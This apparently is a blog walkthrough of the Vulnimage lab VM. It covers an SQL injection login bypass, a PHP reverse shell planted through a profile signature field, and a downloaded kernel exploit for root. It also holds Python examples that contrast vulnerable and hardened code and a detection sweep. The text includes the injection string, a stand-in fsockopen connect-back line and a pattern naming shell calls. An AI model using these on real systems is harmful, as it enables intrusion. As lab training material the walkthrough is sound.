Sunday, August 20, 2017

Vulnimage Walkthrough

This blog post contains a walkthrough for the boot-to-root virtual machine Vulnimage. The purpose of this boot-to-root challenge is to test the network security skills needed for penetration tests, as the user attempts to gain root/system privileges on the remote machine. After determining the IP address of the Vulnimage virtual machine from the "show arp" output of my layer 3 switch, I used Nmap to scan the target.



After the Nmap scan had finished, I examined the report and identified an Apache service running on port 80. I decided this would be where I first focused my efforts to gain root privileges on the machine. At the root of the Apache server I found a link to myblog.php, which appears to be a blog created by one of the target machine's users.


Following the links through the website, I found the login page used by the blogger to sign into the blogging service.



After viewing the web server's response to a normal login attempt, I sent the login request to Burp's Repeater tab, modified the password field and replaced "admin" with "' or 1=1 --", a common SQL injection used to bypass authentication. The trailing "--" turns whatever the application appends to the query (here the closing quote) into a comment, so the rest of the WHERE clause is ignored.




As shown in the Burp Repeater response, I was able to bypass the login page using the credentials admin:' or 1=1 -- and to make a post on the blog as the "admin" user. While examining the website further I came across a link that allowed me to modify a user's profile; the specific field I could modify was the "sig" value, which changes the user's signature. I changed the signature of the admin user to "test". Having confirmed that the signature could be changed, I then tested whether the web server would accept PHP code in the "sig" field.


The password field contains "' or 1=1 --", which bypasses the authentication process.



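To show exactly why the "' or 1=1 --" password works, here is an added example (not code from the blog application on the target, whose source is not shown) that models the login query with Python's built-in sqlite3 module against a constructed two-user table. The query shape, the table and the passwords are assumptions; the vulnerable path pastes the input straight into SQL, the parameterized path binds it, and demo() runs both so the difference is visible.

```python
import sqlite3

# Added example (not the Vulnimage blog's code). Models the login query the
# injection implies, against a constructed in-memory user table.

PAYLOAD = "' or 1=1 --"   # the bypass string used in the walkthrough


def make_db():
    """Constructed sample data: two users with plaintext passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cretPass!"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def render_vulnerable_query(username, password):
    """Assumed shape of the vulnerable query: input pasted straight into SQL."""
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def login_vulnerable(conn, username, password):
    """Returns the matched username, or None. A quote in the input rewrites the SQL:
    password = '' or 1=1 --'  -> every row matches, the trailing quote is a comment."""
    row = conn.execute(render_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same check with bound parameters: the payload is compared as a literal string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Runs both login paths against the sample table and returns the outcomes."""
    conn = make_db()
    return {
        "query_seen_by_db": render_vulnerable_query("admin", PAYLOAD),
        "vuln_real_password": login_vulnerable(conn, "admin", "S3cretPass!"),
        "vuln_admin_payload": login_vulnerable(conn, "admin", PAYLOAD),
        # The username does not even have to exist: "or 1=1" matches every row.
        "vuln_unknown_user_payload": login_vulnerable(conn, "nobody", PAYLOAD),
        "safe_real_password": login_parameterized(conn, "admin", "S3cretPass!"),
        "safe_admin_payload": login_parameterized(conn, "admin", PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two practical notes. On MySQL, which a PHP blog of this vintage would more likely use, the "--" comment only takes effect when followed by whitespace, so the payload is typed as "' or 1=1 -- " with a trailing space (or "#" is used instead). And the fix is not only bound parameters: if the application stored a password hash and compared it in code after fetching the row by username, the password would never enter the SQL at all.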




After injecting the PHP reverse shell code, I identified that the shell had been written to the admin-sig.php file within the profiles directory. Using curl to request that file, I was able to trigger the PHP reverse shell. A reverse shell needs a listener already waiting on the attacking machine before the file is requested, otherwise the connect-back fails and nothing is caught.
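The underlying bug is that the "sig" value is written verbatim into a file with a .php extension under the web root, so anything placed in it runs when the file is requested. The following added example (not the blog application's code, which is not on the page; all function names are hypothetical) models that write path in Python, shows a hardened design that stores the signature as data and escapes it at output time, and includes a small sweep a responder could run over a profiles directory to find planted PHP. The payload is a constructed stand-in containing only the connect-back call, with a documentation-range address.

```python
import html
import json
import os
import re
import tempfile

# Added example (not the Vulnimage blog's code). save_sig_vulnerable models
# what the walkthrough implies (the "sig" value lands verbatim in
# profiles/<user>-sig.php under the web root); save_sig_hardened and
# render_sig_hardened show a safe design; find_injected_php is a quick
# post-incident sweep for planted PHP. All names are hypothetical.

# Constructed stand-in for a PHP reverse shell: only the connect-back call.
PAYLOAD = '<?php $sock = fsockopen("192.0.2.10", 4444); /* reverse shell body omitted */ ?>'

USERNAME_RE = re.compile(r"[a-z0-9_]{1,32}")
SIG_MAX_LEN = 200
# Markers worth flagging in any PHP file a user can influence.
SUSPICIOUS_RE = re.compile(
    r"<\?php|fsockopen|shell_exec|passthru|proc_open|\bsystem\s*\(|\bexec\s*\(", re.I
)


def save_sig_vulnerable(profiles_dir, user, sig):
    """Model of the bug: writes the signature, unescaped, into a .php file
    that the web server will hand to the PHP interpreter on request."""
    path = os.path.join(profiles_dir, f"{user}-sig.php")
    with open(path, "w", encoding="utf-8") as f:
        f.write(f'<p class="sig">{sig}</p>\n')
    return path


def save_sig_hardened(data_dir, user, sig):
    """Validates the username (no path tricks), caps the length and stores the
    signature as data, in a directory that is never served as PHP."""
    if not USERNAME_RE.fullmatch(user):
        raise ValueError("invalid username")
    if len(sig) > SIG_MAX_LEN:
        raise ValueError("signature too long")
    path = os.path.join(data_dir, f"{user}.json")
    with open(path, "w", encoding="utf-8") as f:
        json.dump({"sig": sig}, f)
    return path


def render_sig_hardened(data_dir, user):
    """Reads the stored signature and HTML-escapes it at output time, so
    '<?php' reaches the browser as text instead of the interpreter."""
    if not USERNAME_RE.fullmatch(user):
        raise ValueError("invalid username")
    with open(os.path.join(data_dir, f"{user}.json"), encoding="utf-8") as f:
        sig = json.load(f)["sig"]
    return f'<p class="sig">{html.escape(sig)}</p>'


def find_injected_php(profiles_dir):
    """Lists .php files under a user-writable directory that contain PHP tags
    or shell/network calls; a profile signature file should contain neither."""
    hits = []
    for name in sorted(os.listdir(profiles_dir)):
        if not name.endswith(".php"):
            continue
        with open(os.path.join(profiles_dir, name), encoding="utf-8") as f:
            if SUSPICIOUS_RE.search(f.read()):
                hits.append(name)
    return hits


def demo():
    """Exercises both designs in temporary directories and returns what each produced."""
    webroot = tempfile.mkdtemp(prefix="profiles-")
    datadir = tempfile.mkdtemp(prefix="sigdata-")
    vuln_path = save_sig_vulnerable(webroot, "admin", PAYLOAD)
    with open(vuln_path, encoding="utf-8") as f:
        vuln_file = f.read()
    save_sig_hardened(datadir, "admin", PAYLOAD)
    try:
        save_sig_hardened(datadir, "../../etc/cron.d/x", "x")
        traversal_rejected = False
    except ValueError:
        traversal_rejected = True
    return {
        "vuln_file_name": os.path.basename(vuln_path),
        "vuln_file_has_php": "<?php" in vuln_file,
        "sweep_hits": find_injected_php(webroot),
        "hardened_html": render_sig_hardened(datadir, "admin"),
        "traversal_rejected": traversal_rejected,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The sweep is deliberately crude: on a real box the same idea is an authenticated grep of every PHP file under directories the web server user can write to, compared against what a clean install contains, since an attacker who has already landed a shell can rename or obfuscate the file.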




From the shell I determined that I was running as www-data, that my current directory was "/" on the remote file system, and that the kernel was "Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux". I found a relevant exploit at http://exploit-db.com/sploits/2009-therebel.tgz, downloaded it, placed it within the /var/www/ directory on my local machine and started the local Apache server so the target could fetch it over HTTP.





Once the exploit was transferred to the target, I used tar to unpack the .tgz file, ran the script therebel.sh, and once the exploit had completed I checked whether the shell had gained root privileges. Kernel exploits of this kind can crash the target, so on a VM it is worth taking a snapshot before running one.




I successfully exploited the Vulnimage virtual machine: I gained a reverse shell from the target and escalated it to root, obtaining full control of the target machine.



